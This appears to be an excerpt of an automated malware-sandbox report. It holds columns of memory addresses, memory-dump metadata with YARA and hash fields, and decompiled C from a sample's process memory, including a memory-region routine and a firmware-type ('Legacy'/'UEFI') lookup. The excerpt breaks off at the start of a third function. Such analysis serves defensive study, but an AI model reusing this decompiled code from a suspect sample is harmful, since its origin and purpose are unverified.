                                                                      0x00000000
                                                                      0x0041bd9a
                                                                      0x0041bda0
                                                                      0x0041bda6
                                                                      0x0041bdb8
                                                                      0x0041bdb9
                                                                      0x0041bdba
                                                                      0x0041bdc1
                                                                      0x0041bdc7
                                                                      0x0041bdd3
                                                                      0x0041bdd9
                                                                      0x0041bddf
                                                                      0x0041bde5
                                                                      0x0041bdec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bdf2
                                                                      0x0041be0b
                                                                      0x0041be11
                                                                      0x0041be17
                                                                      0x0041be1d
                                                                      0x0041be31
                                                                      0x0041be37
                                                                      0x0041be3d
                                                                      0x0041be53
                                                                      0x0041be54
                                                                      0x0041be5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041be60
                                                                      0x0041be66
                                                                      0x0041be6c
                                                                      0x0041be7e
                                                                      0x0041be8d
                                                                      0x0041be93
                                                                      0x0041be99
                                                                      0x0041bea0
                                                                      0x0041bea8
                                                                      0x0041beb4
                                                                      0x0041beba
                                                                      0x0041bebd
                                                                      0x0041bec5
                                                                      0x0041becc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bed8
                                                                      0x0041bedf
                                                                      0x0041bee0
                                                                      0x0041bee6
                                                                      0x0041bef2
                                                                      0x0041bef9
                                                                      0x0041befa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bf00
                                                                      0x0041bf07
                                                                      0x0041bf11
                                                                      0x0041bf12
                                                                      0x0041bf18
                                                                      0x0041bf1c
                                                                      0x0041bf1f
                                                                      0x0041bf25
                                                                      0x0041bf3c
                                                                      0x0041bf43
                                                                      0x0041bf56
                                                                      0x0041bf57
                                                                      0x0041bf58
                                                                      0x0041bf59
                                                                      0x0041bf61
                                                                      0x0041bf67
                                                                      0x0041bf6a
                                                                      0x0041bf71
                                                                      0x0041bf77
                                                                      0x0041bf77
                                                                      0x0041bf83
                                                                      0x0041bf8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bf90
                                                                      0x0041bf96
                                                                      0x0041bfa2
                                                                      0x0041bfaf
                                                                      0x0041bfb6
                                                                      0x0041bfbd
                                                                      0x0041bfc9
                                                                      0x0041bfca
                                                                      0x0041bfe0
                                                                      0x0041bfec
                                                                      0x0041bff2
                                                                      0x0041bff8
                                                                      0x0041bffe
                                                                      0x0041c003
                                                                      0x0041c016
                                                                      0x0041c02f
                                                                      0x0041c033
                                                                      0x0041c039
                                                                      0x0041c039
                                                                      0x0041b4a6
                                                                      0x0041b4a6
                                                                      0x0041b4ac
                                                                      0x0041b4b3
                                                                      0x0041b4b4
                                                                      0x0041b4ba
                                                                      0x0041b4c0
                                                                      0x0041b4c7
                                                                      0x0041b4ce
                                                                      0x0041b4d4
                                                                      0x0041b4da
                                                                      0x0041b4dc
                                                                      0x0041b4e2
                                                                      0x0041b4e8
                                                                      0x0041b4f0
                                                                      0x0041b501
                                                                      0x0041b50d
                                                                      0x0041b50e
                                                                      0x0041b51a
                                                                      0x0041b521
                                                                      0x0041b52d
                                                                      0x0041b536
                                                                      0x0041b53c
                                                                      0x0041b53e
                                                                      0x0041b545
                                                                      0x0041b551
                                                                      0x0041b557
                                                                      0x0041b55d
                                                                      0x0041b560
                                                                      0x0041b566
                                                                      0x0041b572
                                                                      0x0041b578
                                                                      0x0041b579
                                                                      0x0041b580
                                                                      0x0041b587
                                                                      0x0041b58d
                                                                      0x0041b5a0
                                                                      0x0041b5a1
                                                                      0x0041b5a7
                                                                      0x0041b5ad
                                                                      0x0041b5c0
                                                                      0x0041b5c7
                                                                      0x0041b5d9
                                                                      0x0041b5df
                                                                      0x0041b5ee
                                                                      0x0041b5f5
                                                                      0x0041b5fb
                                                                      0x0041b602
                                                                      0x0041b603
                                                                      0x0041b609
                                                                      0x0041b615
                                                                      0x0041b61b
                                                                      0x0041b621
                                                                      0x0041b622
                                                                      0x0041b625
                                                                      0x0041b62b
                                                                      0x0041b633
                                                                      0x0041b634
                                                                      0x0041b652
                                                                      0x0041b658
                                                                      0x0041b65e
                                                                      0x0041b66a
                                                                      0x0041b671
                                                                      0x0041b672
                                                                      0x0041b678
                                                                      0x0041b67e
                                                                      0x0041b68a
                                                                      0x0041b690
                                                                      0x0041b6a2
                                                                      0x0041b6a8
                                                                      0x0041b6b4
                                                                      0x0041b6b5
                                                                      0x0041b6bb
                                                                      0x0041b6bc
                                                                      0x0041b6ce
                                                                      0x0041b6e1
                                                                      0x0041b6e2
                                                                      0x0041b6e8
                                                                      0x0041b6ee
                                                                      0x0041b6f4
                                                                      0x0041b6fb
                                                                      0x0041b707
                                                                      0x0041b70d
                                                                      0x0041b713
                                                                      0x0041b71a
                                                                      0x0041b71d
                                                                      0x0041b723
                                                                      0x0041b735
                                                                      0x0041b73c
                                                                      0x0041b742
                                                                      0x0041b748
                                                                      0x0041b74e
                                                                      0x0041b755
                                                                      0x0041b75b
                                                                      0x0041b760
                                                                      0x0041b766
                                                                      0x0041b76d
                                                                      0x0041b772
                                                                      0x0041b779
                                                                      0x0041b77f
                                                                      0x0041b785
                                                                      0x0041b786
                                                                      0x0041b787
                                                                      0x0041b793
                                                                      0x0041b7ac
                                                                      0x0041b7ad
                                                                      0x0041b7b6
                                                                      0x0041b7b9
                                                                      0x0041b7bf
                                                                      0x0041b7c5
                                                                      0x0041b7d7
                                                                      0x0041b7dd
                                                                      0x0041b7f0
                                                                      0x0041b7f3
                                                                      0x0041b7ff
                                                                      0x0041b800
                                                                      0x0041b806
                                                                      0x0041b80c
                                                                      0x0041b812
                                                                      0x0041b815
                                                                      0x0041b81b
                                                                      0x0041b821
                                                                      0x0041b822
                                                                      0x0041b7d7
                                                                      0x0041b779
                                                                      0x0041b742
                                                                      0x0041b6ce
                                                                      0x0041b68a
                                                                      0x0041b5ad
                                                                      0x0041b4e8
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$0
                                                                      • API String ID: 0-203156872
                                                                      • Opcode ID: e279504ad6b9489e5e71e05736d18fbc5aa09aceb2d74ba14c0ebc35aaf5a1f6
                                                                      • Instruction ID: a32b4041c734977c4391b1c176f168cb0998658cff4236d75583e2be8438dec8
                                                                      • Opcode Fuzzy Hash: e279504ad6b9489e5e71e05736d18fbc5aa09aceb2d74ba14c0ebc35aaf5a1f6
                                                                      • Instruction Fuzzy Hash: 81526532918791CFDB02DF38D99AB913FB2F752320B08424ED5A2935D6D738255ACF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00ABE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				signed int _v40;
                                                                      				char _v44;
                                                                      				intOrPtr _v48;
                                                                      				signed int _v52;
                                                                      				unsigned int _v56;
                                                                      				char _v60;
                                                                      				signed int _v64;
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				char _t87;
                                                                      				signed int _t90;
                                                                      				signed int _t94;
                                                                      				signed int _t100;
                                                                      				intOrPtr* _t113;
                                                                      				signed int _t122;
                                                                      				void* _t132;
                                                                      				void* _t135;
                                                                      				signed int _t139;
                                                                      				signed int* _t141;
                                                                      				signed int _t146;
                                                                      				signed int _t147;
                                                                      				void* _t153;
                                                                      				signed int _t155;
                                                                      				signed int _t159;
                                                                      				char _t166;
                                                                      				void* _t172;
                                                                      				void* _t176;
                                                                      				signed int _t177;
                                                                      				intOrPtr* _t179;
                                                                      
                                                                      				_t179 = __ecx;
                                                                      				_v48 = __edx;
                                                                      				_v68 = 0;
                                                                      				_v72 = 0;
                                                                      				_push(__ecx[1]);
                                                                      				_push( *__ecx);
                                                                      				_push(0);
                                                                      				_t153 = 0x14;
                                                                      				_t135 = _t153;
                                                                      				_t132 = E00ABBBBB(_t135, _t153);
                                                                      				if(_t132 == 0) {
                                                                      					_t166 = _v68;
                                                                      					goto L43;
                                                                      				} else {
                                                                      					_t155 = 0;
                                                                      					_v52 = 0;
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					_v56 = __ecx[1];
                                                                      					if( *__ecx >> 8 < 2) {
                                                                      						_t155 = 1;
                                                                      						_v52 = 1;
                                                                      					}
                                                                      					_t139 = _a4;
                                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                                      					_v60 = _t87;
                                                                      					if(_t87 < _t139) {
                                                                      						L11:
                                                                      						_t166 = _v68;
                                                                      						L12:
                                                                      						if(_t132 != 0) {
                                                                      							E00ABBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                      						}
                                                                      						L43:
                                                                      						if(_v72 != 0) {
                                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                                      							_push( *_t179);
                                                                      							_push(0x8000);
                                                                      							E00ABAFDE( &_v72,  &_v60);
                                                                      						}
                                                                      						L46:
                                                                      						return _t166;
                                                                      					}
                                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                      					asm("sbb edi, edi");
                                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                      					if(_t90 != 0) {
                                                                      						_push(0);
                                                                      						_push(0x14);
                                                                      						_push( &_v44);
                                                                      						_push(3);
                                                                      						_push(_t179);
                                                                      						_push(0xffffffff);
                                                                      						if(E00A39730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                      							_push(_t139);
                                                                      							E00ABA80D(_t179, 1, _v40, 0);
                                                                      							_t172 = 4;
                                                                      						}
                                                                      					}
                                                                      					_t141 =  &_v72;
                                                                      					if(E00ABA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                      						_v64 = _a4;
                                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                      						asm("sbb edi, edi");
                                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                      						if(_t94 != 0) {
                                                                      							_push(0);
                                                                      							_push(0x14);
                                                                      							_push( &_v24);
                                                                      							_push(3);
                                                                      							_push(_t179);
                                                                      							_push(0xffffffff);
                                                                      							if(E00A39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                      								_push(_t141);
                                                                      								E00ABA80D(_t179, 1, _v20, 0);
                                                                      								_t176 = 4;
                                                                      							}
                                                                      						}
                                                                      						if(E00ABA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                      							goto L11;
                                                                      						} else {
                                                                      							_t177 = _v64;
                                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                      							_t100 = _v52 + _v52;
                                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                      							 *(_t132 + 0x10) = _t146;
                                                                      							asm("bsf eax, [esp+0x18]");
                                                                      							_v52 = _t100;
                                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                      							_t47 =  &_a8;
                                                                      							 *_t47 = _a8 & 0x00000001;
                                                                      							if( *_t47 == 0) {
                                                                      								E00A12280(_t179 + 0x30, _t179 + 0x30);
                                                                      							}
                                                                      							_t147 =  *(_t179 + 0x34);
                                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                                      							_v68 = 0;
                                                                      							if(_t147 == 0) {
                                                                      								L35:
                                                                      								E00A0B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                      								if(_a8 == 0) {
                                                                      									E00A0FFB0(_t132, _t177, _t179 + 0x30);
                                                                      								}
                                                                      								asm("lock xadd [eax], ecx");
                                                                      								asm("lock xadd [eax], edx");
                                                                      								_t132 = 0;
                                                                      								_v72 = _v72 & 0;
                                                                      								_v68 = _v72;
                                                                      								if(E00A17D50() == 0) {
                                                                      									_t113 = 0x7ffe0388;
                                                                      								} else {
                                                                      									_t177 = _v64;
                                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                      								}
                                                                      								if( *_t113 == _t132) {
                                                                      									_t166 = _v68;
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t166 = _v68;
                                                                      									E00AAFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                      									goto L12;
                                                                      								}
                                                                      							} else {
                                                                      								L23:
                                                                      								while(1) {
                                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                      										_t122 =  *_t147;
                                                                      										if(_t159 == 0) {
                                                                      											L32:
                                                                      											if(_t122 == 0) {
                                                                      												L34:
                                                                      												_v68 = 0;
                                                                      												goto L35;
                                                                      											}
                                                                      											L33:
                                                                      											_t147 = _t122;
                                                                      											continue;
                                                                      										}
                                                                      										if(_t122 == 0) {
                                                                      											goto L34;
                                                                      										}
                                                                      										_t122 = _t122 ^ _t147;
                                                                      										goto L32;
                                                                      									}
                                                                      									_t122 =  *(_t147 + 4);
                                                                      									if(_t159 == 0) {
                                                                      										L27:
                                                                      										if(_t122 != 0) {
                                                                      											goto L33;
                                                                      										}
                                                                      										L28:
                                                                      										_v68 = 1;
                                                                      										goto L35;
                                                                      									}
                                                                      									if(_t122 == 0) {
                                                                      										goto L28;
                                                                      									}
                                                                      									_t122 = _t122 ^ _t147;
                                                                      									goto L27;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_v72 = _v72 & 0x00000000;
                                                                      					goto L11;
                                                                      				}
                                                                      			}




































                                                                      0x00abe547
                                                                      0x00abe549
                                                                      0x00abe54f
                                                                      0x00abe553
                                                                      0x00abe557
                                                                      0x00abe55a
                                                                      0x00abe55c
                                                                      0x00abe55f
                                                                      0x00abe561
                                                                      0x00abe567
                                                                      0x00abe56b
                                                                      0x00abe7e2
                                                                      0x00000000
                                                                      0x00abe571
                                                                      0x00abe575
                                                                      0x00abe577
                                                                      0x00abe57b
                                                                      0x00abe57c
                                                                      0x00abe57d
                                                                      0x00abe57e
                                                                      0x00abe57f
                                                                      0x00abe588
                                                                      0x00abe58f
                                                                      0x00abe591
                                                                      0x00abe592
                                                                      0x00abe592
                                                                      0x00abe596
                                                                      0x00abe59e
                                                                      0x00abe5a0
                                                                      0x00abe5a6
                                                                      0x00abe61d
                                                                      0x00abe61d
                                                                      0x00abe621
                                                                      0x00abe623
                                                                      0x00abe630
                                                                      0x00abe630
                                                                      0x00abe7e6
                                                                      0x00abe7eb
                                                                      0x00abe7ed
                                                                      0x00abe7f4
                                                                      0x00abe7fa
                                                                      0x00abe7ff
                                                                      0x00abe7ff
                                                                      0x00abe80a
                                                                      0x00abe812
                                                                      0x00abe812
                                                                      0x00abe5ab
                                                                      0x00abe5b4
                                                                      0x00abe5b9
                                                                      0x00abe5be
                                                                      0x00abe5c0
                                                                      0x00abe5c2
                                                                      0x00abe5c8
                                                                      0x00abe5c9
                                                                      0x00abe5cb
                                                                      0x00abe5cc
                                                                      0x00abe5d5
                                                                      0x00abe5e4
                                                                      0x00abe5f1
                                                                      0x00abe5f8
                                                                      0x00abe5f8
                                                                      0x00abe5d5
                                                                      0x00abe602
                                                                      0x00abe616
                                                                      0x00abe63d
                                                                      0x00abe644
                                                                      0x00abe64d
                                                                      0x00abe652
                                                                      0x00abe657
                                                                      0x00abe659
                                                                      0x00abe65b
                                                                      0x00abe661
                                                                      0x00abe662
                                                                      0x00abe664
                                                                      0x00abe665
                                                                      0x00abe66e
                                                                      0x00abe67d
                                                                      0x00abe68a
                                                                      0x00abe691
                                                                      0x00abe691
                                                                      0x00abe66e
                                                                      0x00abe6b0
                                                                      0x00000000
                                                                      0x00abe6b6
                                                                      0x00abe6bd
                                                                      0x00abe6c7
                                                                      0x00abe6d7
                                                                      0x00abe6d9
                                                                      0x00abe6db
                                                                      0x00abe6de
                                                                      0x00abe6e3
                                                                      0x00abe6f3
                                                                      0x00abe6fc
                                                                      0x00abe700
                                                                      0x00abe700
                                                                      0x00abe704
                                                                      0x00abe70a
                                                                      0x00abe70a
                                                                      0x00abe713
                                                                      0x00abe716
                                                                      0x00abe719
                                                                      0x00abe720
                                                                      0x00abe761
                                                                      0x00abe76b
                                                                      0x00abe774
                                                                      0x00abe77a
                                                                      0x00abe77a
                                                                      0x00abe78a
                                                                      0x00abe791
                                                                      0x00abe799
                                                                      0x00abe79b
                                                                      0x00abe79f
                                                                      0x00abe7aa
                                                                      0x00abe7c0
                                                                      0x00abe7ac
                                                                      0x00abe7b2
                                                                      0x00abe7b9
                                                                      0x00abe7b9
                                                                      0x00abe7c7
                                                                      0x00abe806
                                                                      0x00000000
                                                                      0x00abe7c9
                                                                      0x00abe7d1
                                                                      0x00abe7d8
                                                                      0x00000000
                                                                      0x00abe7d8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00abe722
                                                                      0x00abe72e
                                                                      0x00abe748
                                                                      0x00abe74c
                                                                      0x00abe754
                                                                      0x00abe756
                                                                      0x00abe75c
                                                                      0x00abe75c
                                                                      0x00000000
                                                                      0x00abe75c
                                                                      0x00abe758
                                                                      0x00abe758
                                                                      0x00000000
                                                                      0x00abe758
                                                                      0x00abe750
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00abe752
                                                                      0x00000000
                                                                      0x00abe752
                                                                      0x00abe730
                                                                      0x00abe735
                                                                      0x00abe73d
                                                                      0x00abe73f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00abe741
                                                                      0x00abe741
                                                                      0x00000000
                                                                      0x00abe741
                                                                      0x00abe739
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00abe73b
                                                                      0x00000000
                                                                      0x00abe73b
                                                                      0x00abe722
                                                                      0x00abe720
                                                                      0x00abe6b0
                                                                      0x00abe618
                                                                      0x00000000
                                                                      0x00abe618

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction ID: ebf0ade6fd28c18ea3bbb70ba4b926d256627d993bf46b59b21530d4b636effd
                                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction Fuzzy Hash: 3B919F312043419FE724CF65C941B9BB7EABF84714F14892DF999CB282EB74E944CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00A751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed short* _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t67;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t88;
                                                                      				intOrPtr _t94;
                                                                      				void* _t100;
                                                                      				void* _t103;
                                                                      				intOrPtr _t105;
                                                                      				signed int _t106;
                                                                      				short* _t108;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				signed int* _t115;
                                                                      				signed short* _t117;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      
                                                                      				_push(0x80);
                                                                      				_push(0xad05f0);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                      				_t115 =  *(_t118 + 0xc);
                                                                      				 *(_t118 - 0x7c) = _t115;
                                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      				_t113 = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                      				_t100 = __ecx;
                                                                      				if(_t100 == 0) {
                                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      					E00A0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                                      					_t63 =  *(_t118 - 0x90);
                                                                      					_t101 = _t63[2];
                                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					L20:
                                                                      					_t65 = _t64 >> 1;
                                                                      					L21:
                                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                      					if(_t108 == 0) {
                                                                      						L27:
                                                                      						 *_t115 = _t65 + 1;
                                                                      						_t67 = 0xc0000023;
                                                                      						L28:
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                      						L29:
                                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                      						E00A753CA(0);
                                                                      						return E00A4D130(0, _t113, _t115);
                                                                      					}
                                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                      							 *_t108 = 0;
                                                                      						}
                                                                      						goto L27;
                                                                      					}
                                                                      					 *_t115 = _t65;
                                                                      					_t115 = _t65 + _t65;
                                                                      					E00A3F3E0(_t108, _t101, _t115);
                                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                      					_t67 = 0;
                                                                      					goto L28;
                                                                      				}
                                                                      				_t103 = _t100 - 1;
                                                                      				if(_t103 == 0) {
                                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                      					_t74 = E00A13690(1, _t117, 0x9d1810, _t118 - 0x74);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                      					_t101 = _t117[2];
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					if(_t74 < 0) {
                                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                                      						_t115 =  *(_t118 - 0x7c);
                                                                      						goto L20;
                                                                      					}
                                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                      					_t115 =  *(_t118 - 0x7c);
                                                                      					goto L21;
                                                                      				}
                                                                      				if(_t103 == 1) {
                                                                      					_t105 = 4;
                                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                      					_push(_t118 - 0x70);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(_t105);
                                                                      					_push(_t118 - 0x78);
                                                                      					_push(0x6b);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E00A3AA90();
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      					_t113 = L00A14620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                      					if(_t113 != 0) {
                                                                      						_push(_t118 - 0x70);
                                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                      						_push(_t113);
                                                                      						_push(4);
                                                                      						_push(_t118 - 0x78);
                                                                      						_push(0x6b);
                                                                      						_t84 = E00A3AA90();
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                      						if(_t84 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t110 = 0;
                                                                      						_t106 = 0;
                                                                      						while(1) {
                                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                      							 *(_t118 - 0x88) = _t106;
                                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                      								break;
                                                                      							}
                                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                      							_t106 = _t106 + 1;
                                                                      						}
                                                                      						_t88 = E00A7500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                      						_t119 = _t119 + 0x1c;
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                      						if(_t88 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t101 = _t118 - 0x3c;
                                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                      						goto L21;
                                                                      					}
                                                                      					_t67 = 0xc0000017;
                                                                      					goto L28;
                                                                      				}
                                                                      				_push(0);
                                                                      				_push(0x20);
                                                                      				_push(_t118 - 0x60);
                                                                      				_push(0x5a);
                                                                      				_t94 = E00A39860();
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                      				if(_t94 < 0) {
                                                                      					goto L29;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                      					_t101 = L"Legacy";
                                                                      					_push(6);
                                                                      				} else {
                                                                      					_t101 = L"UEFI";
                                                                      					_push(4);
                                                                      				}
                                                                      				_pop(_t65);
                                                                      				goto L21;
                                                                      			}






















                                                                      0x00a751be
                                                                      0x00a751c3
                                                                      0x00a751c8
                                                                      0x00a751cd
                                                                      0x00a751d0
                                                                      0x00a751d3
                                                                      0x00a751d8
                                                                      0x00a751db
                                                                      0x00a751de
                                                                      0x00a751e0
                                                                      0x00a751e3
                                                                      0x00a751e6
                                                                      0x00a751e8
                                                                      0x00a75342
                                                                      0x00a75351
                                                                      0x00a75356
                                                                      0x00a7535a
                                                                      0x00a75360
                                                                      0x00a75363
                                                                      0x00a75366
                                                                      0x00a75369
                                                                      0x00a75369
                                                                      0x00a7536b
                                                                      0x00a7536b
                                                                      0x00a75370
                                                                      0x00a753a3
                                                                      0x00a753a4
                                                                      0x00a753a6
                                                                      0x00a753ab
                                                                      0x00a753ab
                                                                      0x00a753ae
                                                                      0x00a753ae
                                                                      0x00a753b5
                                                                      0x00a753bf
                                                                      0x00a753bf
                                                                      0x00a75375
                                                                      0x00a75396
                                                                      0x00a753a0
                                                                      0x00a753a0
                                                                      0x00000000
                                                                      0x00a75396
                                                                      0x00a75377
                                                                      0x00a75379
                                                                      0x00a7537f
                                                                      0x00a7538c
                                                                      0x00a75390
                                                                      0x00000000
                                                                      0x00a75390
                                                                      0x00a751ee
                                                                      0x00a751f1
                                                                      0x00a75301
                                                                      0x00a75310
                                                                      0x00a75315
                                                                      0x00a75318
                                                                      0x00a7531b
                                                                      0x00a75320
                                                                      0x00a7532e
                                                                      0x00a75331
                                                                      0x00000000
                                                                      0x00a75331
                                                                      0x00a75328
                                                                      0x00a75329
                                                                      0x00000000
                                                                      0x00a75329
                                                                      0x00a751fa
                                                                      0x00a75235
                                                                      0x00a75236
                                                                      0x00a75239
                                                                      0x00a7523f
                                                                      0x00a75240
                                                                      0x00a75241
                                                                      0x00a75242
                                                                      0x00a75246
                                                                      0x00a75247
                                                                      0x00a7524e
                                                                      0x00a75251
                                                                      0x00a75267
                                                                      0x00a75269
                                                                      0x00a7526e
                                                                      0x00a7527d
                                                                      0x00a7527e
                                                                      0x00a75281
                                                                      0x00a75282
                                                                      0x00a75287
                                                                      0x00a75288
                                                                      0x00a7528a
                                                                      0x00a7528f
                                                                      0x00a75294
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a7529a
                                                                      0x00a7529c
                                                                      0x00a7529e
                                                                      0x00a7529e
                                                                      0x00a752a4
                                                                      0x00a752b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a752ba
                                                                      0x00a752bc
                                                                      0x00a752bc
                                                                      0x00a752d4
                                                                      0x00a752d9
                                                                      0x00a752dc
                                                                      0x00a752e1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a752e7
                                                                      0x00a752f4
                                                                      0x00000000
                                                                      0x00a752f4
                                                                      0x00a75270
                                                                      0x00000000
                                                                      0x00a75270
                                                                      0x00a751fc
                                                                      0x00a751fd
                                                                      0x00a75202
                                                                      0x00a75203
                                                                      0x00a75205
                                                                      0x00a7520a
                                                                      0x00a7520f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a7521b
                                                                      0x00a75226
                                                                      0x00a7522b
                                                                      0x00a7521d
                                                                      0x00a7521d
                                                                      0x00a75222
                                                                      0x00a75222
                                                                      0x00a7522d
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 44bdafaa85117f62bcc33610eae910d3e35576dbbbf3d14c0a608391280ae6ca
                                                                      • Instruction ID: 822b0c5c353638a156bebd34282b113477544e758550d1b102130faffed318ad
                                                                      • Opcode Fuzzy Hash: 44bdafaa85117f62bcc33610eae910d3e35576dbbbf3d14c0a608391280ae6ca
                                                                      • Instruction Fuzzy Hash: 49515DB1E00A199FDB24DFA8CD50AAEB7F8FF48740F14C02DE559EB252DAB19940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00408C5B(signed int* _a4) {
